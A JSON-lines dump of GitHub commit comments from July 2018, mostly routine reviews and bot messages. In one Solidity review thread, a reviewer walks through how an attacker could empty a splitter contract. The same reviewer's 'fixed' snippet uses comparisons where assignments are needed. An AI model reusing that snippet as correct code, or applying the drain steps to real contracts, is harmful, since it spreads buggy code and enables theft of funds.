{"id":"8003097692","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29798555,"position":99,"line":57,"path":"contracts/Splitter.sol","commit_id":"e7bf72a4462d74ff70a26166e95ef9a732f0dace","created_at":"2018-07-23T10:41:26Z","updated_at":"2018-07-23T10:41:26Z","author_association":"NONE","body":"No, I was not mentioning `address.balance`, I was talking about `uint balance;`. Here is your code fixed:\r\n\r\n```solidity\r\nuint balance; // balance == 0 here\r\nif (msg.sender == owner) balance = ownerBalance; // It has been set perhaps\r\nif (msg.sender == bob) balance == bobBalance; // It has been set perhaps\r\nif (msg.sender == carol) balance == carolBalance;  // It has been set perhaps\r\n// Now balance has been set we can use it. No need to copy it into a new allowance variable\r\nrequire(balance > 0, \"nothing to withdraw, balance equals 0\"); // See how I use balance?\r\nemit WithdrawalMade(msg.sender, balance); // See how I use balance?\r\nmsg.sender.transfer(balance); // See how I use balance?\r\n```"}},"created_at":"2018-07-23T10:41:26Z"}
{"id":"8003100361","type":"CommitCommentEvent","actor":{"login":"grabbou"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29798558,"position":32,"line":27,"path":"local-cli/bundle/unbundle.js","commit_id":"ebf5aeab280f2ebc439ec39d25c48fdf1980cf73","created_at":"2018-07-23T10:42:00Z","updated_at":"2018-07-23T10:42:00Z","author_association":"COLLABORATOR","body":"Not sure I understand this - how's that renamed to a flag if the function is throwing an error in all the cases?"}},"created_at":"2018-07-23T10:42:00Z"}
{"id":"8003106946","type":"CommitCommentEvent","actor":{"login":"Aion253"},"repo":{"name":"Aion253/AOS"},"payload":{"comment":{"id":29798567,"position":null,"line":null,"path":null,"commit_id":"355cc414210667814560bbd53e16e19e93c128e6","created_at":"2018-07-23T10:43:29Z","updated_at":"2018-07-23T10:43:29Z","author_association":"OWNER","body":"I'm 100% going to check this for spelling mistakes (and general accuracy) when I get up in the morning."}},"created_at":"2018-07-23T10:43:29Z"}
{"id":"8003107841","type":"CommitCommentEvent","actor":{"login":"quanwc"},"repo":{"name":"quanwc/G_Java"},"payload":{"comment":{"id":29798569,"position":null,"line":null,"path":null,"commit_id":"05fa6b0ff2d230da9952cb15abbe9f2d9769bbf4","created_at":"2018-07-23T10:43:41Z","updated_at":"2018-07-23T10:43:41Z","author_association":"OWNER","body":"该项目，主要用来学习，记录java的基础知识。主要是SE、Web等"}},"created_at":"2018-07-23T10:43:41Z"}
{"id":"8003111565","type":"CommitCommentEvent","actor":{"login":"kocur4d"},"repo":{"name":"Anianias7/LoginPage"},"payload":{"comment":{"id":29798575,"position":4,"line":4,"path":"src/Components/Heading/Heading.js","commit_id":"1c42efe7679abf70474e97d04af3b38fed96aaea","created_at":"2018-07-23T10:44:29Z","updated_at":"2018-07-23T10:44:29Z","author_association":"NONE","body":"Strange, everywhere where I look they are capitalised. I would keep them uppercase. In my applications 99% components are stateless as I am using redux all the time. I wouldn't need to distinguish between stateless or not by looking at the name.  "}},"created_at":"2018-07-23T10:44:29Z"}
{"id":"8003115586","type":"CommitCommentEvent","actor":{"login":"Kiritsu"},"repo":{"name":"phamdat2/Swyrin"},"payload":{"comment":{"id":29798581,"position":null,"line":null,"path":null,"commit_id":"bad6a632feb96f001635ffa45214835d8261358a","created_at":"2018-07-23T10:45:21Z","updated_at":"2018-07-23T10:45:21Z","author_association":"NONE","body":"Thank you! :)"}},"created_at":"2018-07-23T10:45:21Z"}
{"id":"8003115996","type":"CommitCommentEvent","actor":{"login":"xiaohao0621"},"repo":{"name":"xiaohao0621/gamll"},"payload":{"comment":{"id":29798582,"position":null,"line":null,"path":null,"commit_id":"d59c7c877ecfa389c5e5e8952ccce3c9bf341597","created_at":"2018-07-23T10:45:26Z","updated_at":"2018-07-23T10:45:26Z","author_association":"OWNER","body":"fddgdsfdgdfdds"}},"created_at":"2018-07-23T10:45:26Z"}
{"id":"8003117226","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29798585,"position":55,"line":40,"path":"contracts/Splitter.sol","commit_id":"bed4dd9077b334892416b8412efcc2e14cff5c61","created_at":"2018-07-23T10:45:42Z","updated_at":"2018-07-23T10:45:42Z","author_association":"NONE","body":"What? This is a huge hole!! Just think about what you did here.\r\n\r\n* The contract's balance is 10 Ether from all the past activity.\r\n* I send a split of 2 weis to 2 `address1` and `address2`\r\n* So now `balances[balance1] == 1 wei`\r\n* Also now, the contracts balance is 10 Ether + 2 weis\r\n* I make sure that `address1`'s balance has 10 Ether and 2 weis. On the private key, not \"as a balance in the contract\".\r\n* I use `address1` to withdraw. \r\n\r\nBoom, in 1 transaction I emptied the whole contract!"}},"created_at":"2018-07-23T10:45:42Z"}
{"id":"8003119957","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29798588,"position":29,"line":24,"path":"contracts/Splitter.sol","commit_id":"bed4dd9077b334892416b8412efcc2e14cff5c61","created_at":"2018-07-23T10:46:18Z","updated_at":"2018-07-23T10:46:18Z","author_association":"NONE","body":"This line should not compile, you omitted the `payable`."}},"created_at":"2018-07-23T10:46:18Z"}
{"id":"8003121013","type":"CommitCommentEvent","actor":{"login":"frobware"},"repo":{"name":"ingvagabund/openshift-ansible"},"payload":{"comment":{"id":29798590,"position":13,"line":13,"path":"playbooks/openshift-cluster-autoscaler/README.md","commit_id":"b0230f13c6357d3f7b1b12ff860b813251270a88","created_at":"2018-07-23T10:46:32Z","updated_at":"2018-07-23T10:46:32Z","author_association":"NONE","body":"I think we should s/provision.ini/inventory/. "}},"created_at":"2018-07-23T10:46:32Z"}
{"id":"8003123324","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29798596,"position":49,"line":35,"path":"contracts/Splitter.sol","commit_id":"bed4dd9077b334892416b8412efcc2e14cff5c61","created_at":"2018-07-23T10:47:03Z","updated_at":"2018-07-23T10:47:03Z","author_association":"NONE","body":"Same hole here. Bad!"}},"created_at":"2018-07-23T10:47:03Z"}
{"id":"8003124837","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"piatra/activity-stream"},"payload":{"comment":{"id":29798598,"position":null,"line":null,"path":null,"commit_id":"25a6dc69eb598e0ed725765d7dc6f184543df3b4","created_at":"2018-07-23T10:47:23Z","updated_at":"2018-07-23T10:47:23Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nYou do not have sufficient scopes. You are missing the following scopes:\n\n```\n{\n  \"AllOf\": [\n    \"queue:route:notify.irc-channel.#activity-stream.on-failed\",\n    \"queue:route:notify.irc-channel.#activity-stream.on-exception\"\n  ]\n}\n```\n\nYou have the scopes:\n\n```\n[\n  \"assume:repo:github.com/piatra/activity-stream:branch:taskcluster-test\",\n  \"queue:create-task:aws-provisioner-v1/github-worker\",\n  \"queue:create-task:aws-provisioner-v1/win2012r2\",\n  \"queue:route:index.garbage.*\",\n  \"queue:scheduler-id:taskcluster-github\",\n  \"secrets:get:garbage/*\",\n  \"secrets:set:garbage/*\"\n]\n```\n\nThis request requires you to satisfy this scope expression:\n\n```\n{\n  \"AllOf\": [\n    \"queue:route:notify.irc-channel.#activity-stream.on-failed\",\n    \"queue:route:notify.irc-channel.#activity-stream.on-exception\",\n    {\n      \"AnyOf\": [\n        {\n          \"AllOf\": [\n            \"queue:scheduler-id:taskcluster-github\",\n            {\n              \"AnyOf\": [\n                \"queue:create-task:highest:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:very-high:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:high:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:medium:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:low:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:very-low:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:lowest:aws-provisioner-v1/github-worker\"\n              ]\n            }\n          ]\n        },\n        {\n          \"AnyOf\": [\n            \"queue:create-task:aws-provisioner-v1/github-worker\",\n            {\n              \"AllOf\": [\n                \"queue:define-task:aws-provisioner-v1/github-worker\",\n                \"queue:task-group-id:taskcluster-github/V3YjbS6QRTeS5zs_J8Yqnw\",\n                \"queue:schedule-task:taskcluster-github/V3YjbS6QRTeS5zs_J8Yqnw/V3YjbS6QRTeS5zs_J8Yqnw\"\n              ]\n            }\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\n---\n\n* method:     createTask\n* errorCode:  InsufficientScopes\n* statusCode: 403\n* time:       2018-07-23T10:47:23.002Z\n\n</details>"}},"created_at":"2018-07-23T10:47:23Z"}
{"id":"8003125663","type":"CommitCommentEvent","actor":{"login":"frobware"},"repo":{"name":"ingvagabund/openshift-ansible"},"payload":{"comment":{"id":29798600,"position":18,"line":18,"path":"playbooks/openshift-cluster-autoscaler/README.md","commit_id":"b0230f13c6357d3f7b1b12ff860b813251270a88","created_at":"2018-07-23T10:47:35Z","updated_at":"2018-07-23T10:47:35Z","author_association":"NONE","body":"\"that have the `infra`\"..."}},"created_at":"2018-07-23T10:47:35Z"}
{"id":"8003125683","type":"CommitCommentEvent","actor":{"login":"svintuskbd"},"repo":{"name":"svintuskbd/mvc.site"},"payload":{"comment":{"id":29798601,"position":23,"line":58,"path":"application/models/ModelBlog.php","commit_id":"6482e488ce77eecc5d7586c937713bcbd871da94","created_at":"2018-07-23T10:47:35Z","updated_at":"2018-07-23T10:47:35Z","author_association":"OWNER","body":"Thanks, i know, it is just tests, don't live functions"}},"created_at":"2018-07-23T10:47:35Z"}
{"id":"8003126581","type":"CommitCommentEvent","actor":{"login":"kocur4d"},"repo":{"name":"Anianias7/LoginPage"},"payload":{"comment":{"id":29798602,"position":null,"line":null,"path":null,"commit_id":"1c42efe7679abf70474e97d04af3b38fed96aaea","created_at":"2018-07-23T10:47:46Z","updated_at":"2018-07-23T10:47:46Z","author_association":"NONE","body":"In general very nice! 🎊 I can't say much about `src/Containers/Form/Form.js` as I don't really use `setState`. \r\n\r\nThe `src/services/validators.service.js` sounds very Angular :)\r\n\r\n💯 "}},"created_at":"2018-07-23T10:47:46Z"}
{"id":"8003127218","type":"CommitCommentEvent","actor":{"login":"fhelwanger"},"repo":{"name":"fhelwanger/gerar-pis"},"payload":{"comment":{"id":29798603,"position":33,"line":33,"path":"index.html","commit_id":"e13b343804b751cceca3f551f5362ab248096b08","created_at":"2018-07-23T10:47:55Z","updated_at":"2018-07-23T10:47:55Z","author_association":"OWNER","body":"Essa é a mensagem de validação que eu sempre quis colocar em tudo 🤣 "}},"created_at":"2018-07-23T10:47:55Z"}
{"id":"8003127273","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29798604,"position":49,"line":35,"path":"contracts/Splitter.sol","commit_id":"bed4dd9077b334892416b8412efcc2e14cff5c61","created_at":"2018-07-23T10:47:55Z","updated_at":"2018-07-23T10:47:55Z","author_association":"NONE","body":"Rename `balances` to `myPrecious` and see if the line makes sense:\r\n\r\n```javascript\r\nmyPrecious[recipient2] = recipient2.balance.add(half);\r\n```"}},"created_at":"2018-07-23T10:47:55Z"}
{"id":"8003127763","type":"CommitCommentEvent","actor":{"login":"frobware"},"repo":{"name":"ingvagabund/openshift-ansible"},"payload":{"comment":{"id":29798605,"position":20,"line":20,"path":"playbooks/openshift-cluster-autoscaler/README.md","commit_id":"b0230f13c6357d3f7b1b12ff860b813251270a88","created_at":"2018-07-23T10:48:02Z","updated_at":"2018-07-23T10:48:02Z","author_association":"NONE","body":"s/proper/appropriate"}},"created_at":"2018-07-23T10:48:02Z"}
{"id":"8003134657","type":"CommitCommentEvent","actor":{"login":"reptest"},"repo":{"name":"Transcompagny/git_rep_demo"},"payload":{"comment":{"id":29798614,"position":1,"line":1,"path":"README.md","commit_id":"0017592524a051901d9c10da8f1976e70cce96ba","created_at":"2018-07-23T10:49:33Z","updated_at":"2018-07-23T10:49:33Z","author_association":"CONTRIBUTOR","body":"hello"}},"created_at":"2018-07-23T10:49:33Z"}
{"id":"8003135748","type":"CommitCommentEvent","actor":{"login":"frobware"},"repo":{"name":"ingvagabund/openshift-ansible"},"payload":{"comment":{"id":29798617,"position":80,"line":80,"path":"playbooks/openshift-cluster-autoscaler/README.md","commit_id":"b0230f13c6357d3f7b1b12ff860b813251270a88","created_at":"2018-07-23T10:49:49Z","updated_at":"2018-07-23T10:49:49Z","author_association":"NONE","body":"Add missing namespace: `oc create -n openshift-autoscaler -f scale-up.yaml`"}},"created_at":"2018-07-23T10:49:49Z"}
{"id":"8003140501","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"BO41/phpmyadmin"},"payload":{"comment":{"id":29798620,"position":null,"line":null,"path":null,"commit_id":"cc9974c5216701b13bb6aea182839012526a571c","created_at":"2018-07-23T10:50:55Z","updated_at":"2018-07-23T10:50:55Z","author_association":"NONE","body":"<!-- PMABOT:TAB -->\nThis commit is using tab character for indentation instead of spaces, what is mandated by phpMyAdmin. Please check our [Developer guidelines](https://github.com/phpmyadmin/phpmyadmin/wiki/Developer_guidelines#Indentation) for more information.\n\nOffending files: themes/original/jquery/jquery-ui.css, themes/pmahomme/jquery/jquery-ui.css"}},"created_at":"2018-07-23T10:50:55Z"}
{"id":"8003143677","type":"CommitCommentEvent","actor":{"login":"KayV67"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29798624,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T10:51:37Z","updated_at":"2018-07-23T10:51:37Z","author_association":"NONE","body":"What a absolutely awesome project brilliant idea "}},"created_at":"2018-07-23T10:51:37Z"}
{"id":"8003147251","type":"CommitCommentEvent","actor":{"login":"VividOrion"},"repo":{"name":"VividOrion/GitDemo"},"payload":{"comment":{"id":29798630,"position":null,"line":null,"path":null,"commit_id":"e576debec9f50b5fbbd01bfd1f8fedf8e8acb194","created_at":"2018-07-23T10:52:27Z","updated_at":"2018-07-23T10:52:27Z","author_association":"OWNER","body":"merging with master"}},"created_at":"2018-07-23T10:52:27Z"}
{"id":"8003149108","type":"CommitCommentEvent","actor":{"login":"alxmiron"},"repo":{"name":"HiTask/blueprint"},"payload":{"comment":{"id":29798631,"position":null,"line":null,"path":null,"commit_id":"d7c6d96b9fce1b4583e4005606f242b2bf6f5f1d","created_at":"2018-07-23T10:52:51Z","updated_at":"2018-07-23T10:52:51Z","author_association":"NONE","body":"<h3>Icons: remove hi-item-note, hi-list-document, hi-list-event</h3>\n\nPreview: <strong><a href='https://429-75619030-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://429-75619030-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://429-75619030-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-23T10:52:51Z"}
{"id":"8003153101","type":"CommitCommentEvent","actor":{"login":"LopaWang"},"repo":{"name":"LopaWang/intercom-master"},"payload":{"comment":{"id":29798635,"position":null,"line":null,"path":null,"commit_id":"44b4e8fd1d11f33dc7f556aeee196d614bc00c02","created_at":"2018-07-23T10:53:43Z","updated_at":"2018-07-23T10:53:43Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-23T10:53:43Z"}
{"id":"8003157254","type":"CommitCommentEvent","actor":{"login":"LopaWang"},"repo":{"name":"LopaWang/intercom-master"},"payload":{"comment":{"id":29798643,"position":null,"line":null,"path":null,"commit_id":"44b4e8fd1d11f33dc7f556aeee196d614bc00c02","created_at":"2018-07-23T10:54:37Z","updated_at":"2018-07-23T10:54:37Z","author_association":"OWNER","body":"- \r\n\r\n- [ ] \r\n\r\n> `[1. ](**url**)`"}},"created_at":"2018-07-23T10:54:37Z"}
{"id":"8003159137","type":"CommitCommentEvent","actor":{"login":"chandramoulireddy"},"repo":{"name":"chandramoulireddy/chandra"},"payload":{"comment":{"id":29798648,"position":null,"line":null,"path":null,"commit_id":"8b1afa692d651a0d96fc9cb6aa29847681dd26e3","created_at":"2018-07-23T10:55:02Z","updated_at":"2018-07-23T10:55:02Z","author_association":"OWNER","body":"k thank you"}},"created_at":"2018-07-23T10:55:02Z"}
{"id":"8003164227","type":"CommitCommentEvent","actor":{"login":"lauravignoli"},"repo":{"name":"jembi/openmrs-module-msfcore"},"payload":{"comment":{"id":29798655,"position":19,"line":34,"path":"api/src/main/java/org/openmrs/module/msfcore/api/dao/MSFCoreDao.java","commit_id":"5f25d1f5d29251a37202318cafeaca4e7f3e0eec","created_at":"2018-07-23T10:56:07Z","updated_at":"2018-07-23T10:56:07Z","author_association":"NONE","body":"@kaweesi Please add unit test for this"}},"created_at":"2018-07-23T10:56:07Z"}
{"id":"8003167058","type":"CommitCommentEvent","actor":{"login":"lauravignoli"},"repo":{"name":"jembi/openmrs-module-msfcore"},"payload":{"comment":{"id":29798657,"position":12,"line":12,"path":"omod/src/main/java/org/openmrs/module/msfcore/ControllerService.java","commit_id":"5f25d1f5d29251a37202318cafeaca4e7f3e0eec","created_at":"2018-07-23T10:56:44Z","updated_at":"2018-07-23T10:56:44Z","author_association":"NONE","body":"@kaweesi Please add unit test for this"}},"created_at":"2018-07-23T10:56:44Z"}
{"id":"8003175020","type":"CommitCommentEvent","actor":{"login":"plusun"},"repo":{"name":"plusun/src"},"payload":{"comment":{"id":29798665,"position":null,"line":null,"path":null,"commit_id":"b49e95e9d3692f40fc3d75ec886fb3ffe7bc09f2","created_at":"2018-07-23T10:58:30Z","updated_at":"2018-07-23T10:58:30Z","author_association":"OWNER","body":"Adding -g to CFLAGS and LDFLAGS seems to be not working, either, there is no symbol. the result of file(1):\r\n`main: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /libexec/ld.elf_so, for NetBSD 8.99.17, with debug_info, not stripped`"}},"created_at":"2018-07-23T10:58:30Z"}
{"id":"8003181247","type":"CommitCommentEvent","actor":{"login":"somejavadev"},"repo":{"name":"spring-projects/spring-vault"},"payload":{"comment":{"id":29798677,"position":null,"line":null,"path":null,"commit_id":"814f42afc268b2127cb4bab2e3dc975f94ad52a0","created_at":"2018-07-23T10:59:56Z","updated_at":"2018-07-23T10:59:56Z","author_association":"NONE","body":"Excellent, thanks @mp911de "}},"created_at":"2018-07-23T10:59:56Z"}
{"id":"8003182403","type":"CommitCommentEvent","actor":{"login":"bschi"},"repo":{"name":"contao/core-bundle"},"payload":{"comment":{"id":29798681,"position":null,"line":null,"path":null,"commit_id":"296ab0ebb18ba93ca4de3907dcab7458ae29fecc","created_at":"2018-07-23T11:00:11Z","updated_at":"2018-07-23T11:00:11Z","author_association":"NONE","body":"@leofeyer, @kalessil Diese Stelle hier scheint nicht korrekt zu sein.\r\n\r\n```php\r\n$arrValues[$k] = ($v === null) ? 'NULL' : $v;\r\n$arrValues[$k] = $v ?? 'NULL';"}},"created_at":"2018-07-23T11:00:11Z"}
{"id":"8003185491","type":"CommitCommentEvent","actor":{"login":"0legKot"},"repo":{"name":"0legKot/Godsend"},"payload":{"comment":{"id":29798690,"position":null,"line":null,"path":null,"commit_id":"b50dced9cd37a7c3dc31709c77ad74aa32832811","created_at":"2018-07-23T11:00:47Z","updated_at":"2018-07-23T11:00:47Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Add description to articles](https://trello.com/c/iCGhrSJP/80-add-description-to-articles)"}},"created_at":"2018-07-23T11:00:47Z"}
{"id":"8003186205","type":"CommitCommentEvent","actor":{"login":"0legKot"},"repo":{"name":"0legKot/Godsend"},"payload":{"comment":{"id":29798691,"position":null,"line":null,"path":null,"commit_id":"1f3d01d5395b54c724d11c5120ecd5ce705fae58","created_at":"2018-07-23T11:00:56Z","updated_at":"2018-07-23T11:00:56Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Add description to articles](https://trello.com/c/iCGhrSJP/80-add-description-to-articles)"}},"created_at":"2018-07-23T11:00:56Z"}
{"id":"8003188793","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/refarm-site"},"payload":{"comment":{"id":29798696,"position":null,"line":null,"path":null,"commit_id":"e0cc78d6447f4de14b9c4a93bb92f1bffb2d7b88","created_at":"2018-07-23T11:01:32Z","updated_at":"2018-07-23T11:01:32Z","author_association":"COLLABORATOR","body":"Puzzle `140-694a3b50` disappeared from [`tests/refarm_redirects/test_views.py`](https://github.com/fidals/refarm-site/blob/master/tests/refarm_redirects/test_views.py), that's why I closed #151. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-23T11:01:32Z"}
{"id":"8003188950","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/refarm-site"},"payload":{"comment":{"id":29798699,"position":null,"line":null,"path":null,"commit_id":"e0cc78d6447f4de14b9c4a93bb92f1bffb2d7b88","created_at":"2018-07-23T11:01:35Z","updated_at":"2018-07-23T11:01:35Z","author_association":"COLLABORATOR","body":"Puzzle `360-25169cf6` discovered in   [`tests/refarm_redirects/test_views.py`](  https://github.com/fidals/refarm-site/blob/master/tests/refarm_redirects/test_views.py)   and submitted as #154. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-23T11:01:35Z"}
{"id":"8003189034","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/refarm-site"},"payload":{"comment":{"id":29798700,"position":null,"line":null,"path":null,"commit_id":"e0cc78d6447f4de14b9c4a93bb92f1bffb2d7b88","created_at":"2018-07-23T11:01:36Z","updated_at":"2018-07-23T11:01:36Z","author_association":"COLLABORATOR","body":"Puzzle `360-caeda8fe` discovered in   [`tests/refarm_redirects/test_views.py`](  https://github.com/fidals/refarm-site/blob/master/tests/refarm_redirects/test_views.py)   and submitted as #155. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-23T11:01:36Z"}
{"id":"8003189167","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/refarm-site"},"payload":{"comment":{"id":29798701,"position":null,"line":null,"path":null,"commit_id":"e0cc78d6447f4de14b9c4a93bb92f1bffb2d7b88","created_at":"2018-07-23T11:01:38Z","updated_at":"2018-07-23T11:01:38Z","author_association":"COLLABORATOR","body":"I wasn't able to retrieve PDD puzzles from the code base and submit them to GitHub. If you think that it's a bug on our side, please submit it to [yegor256/0pdd](https://github.com/yegor256/0pdd/issues):\n\n> GET https://api.github.com/repos/fidals/refarm-site/issues/360: 404 - Not Found // See: https://developer.github.com/v3/issues/#get-a-single-issue\n\n\nPlease, copy and paste this stack trace to GitHub:\n\n\n```\nOctokit::NotFound\nGET https://api.github.com/repos/fidals/refarm-site/issues/360: 404 - Not Found // See: https://developer.github.com/v3/issues/#get-a-single-issue\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/response/raise_error.rb:16:in `on_complete'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/response.rb:9:in `block in call'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/response.rb:61:in `on_complete'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/response.rb:8:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/middleware/follow_redirects.rb:73:in `perform_with_redirection'\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/middleware/follow_redirects.rb:61:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/rack_builder.rb:143:in `build_response'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/connection.rb:387:in `run_request'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/connection.rb:138:in `get'\n/app/vendor/bundle/ruby/2.3.0/gems/sawyer-0.8.1/lib/sawyer/agent.rb:94:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/connection.rb:156:in `request'\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/connection.rb:19:in `get'\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/client/issues.rb:114:in `issue'\n/app/objects/github_tickets.rb:39:in `notify'\n/app/objects/logged_tickets.rb:36:in `notify'\n/app/objects/github_tagged_tickets.rb:36:in `notify'\n/app/objects/commit_tickets.rb:34:in `notify'\n/app/objects/emailed_tickets.rb:31:in `notify'\n/app/objects/sentry_tickets.rb:36:in `notify'\n/app/objects/diff.rb:38:in `block in notify'\n/app/objects/diff.rb:33:in `each'\n/app/objects/diff.rb:33:in `notify'\n/app/objects/job.rb:40:in `proceed'\n/app/objects/job_starred.rb:33:in `proceed'\n/app/objects/job_recorded.rb:32:in `proceed'\n/app/objects/job_emailed.rb:35:in `proceed'\n/app/objects/job_commiterrors.rb:36:in `proceed'\n/app/objects/job_detached.rb:48:in `exclusive'\n/app/objects/job_detached.rb:36:in `block in proceed'\n/app/objects/job_detached.rb:36:in `fork'\n/app/objects/job_detached.rb:36:in `proceed'\n/app/0pdd.rb:342:in `block in <top (required)>'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `block in compile!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (3 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1011:in `route_eval'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (2 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1039:in `block in process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:990:in `block in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `each'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1096:in `block in dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1093:in `dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `block in call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:913:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/xss_header.rb:18:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/path_traversal.rb:16:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/json_csrf.rb:26:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/frame_options.rb:31:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/logger.rb:15:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/common_logger.rb:33:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:231:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:224:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/head.rb:12:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/method_override.rb:22:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:194:in 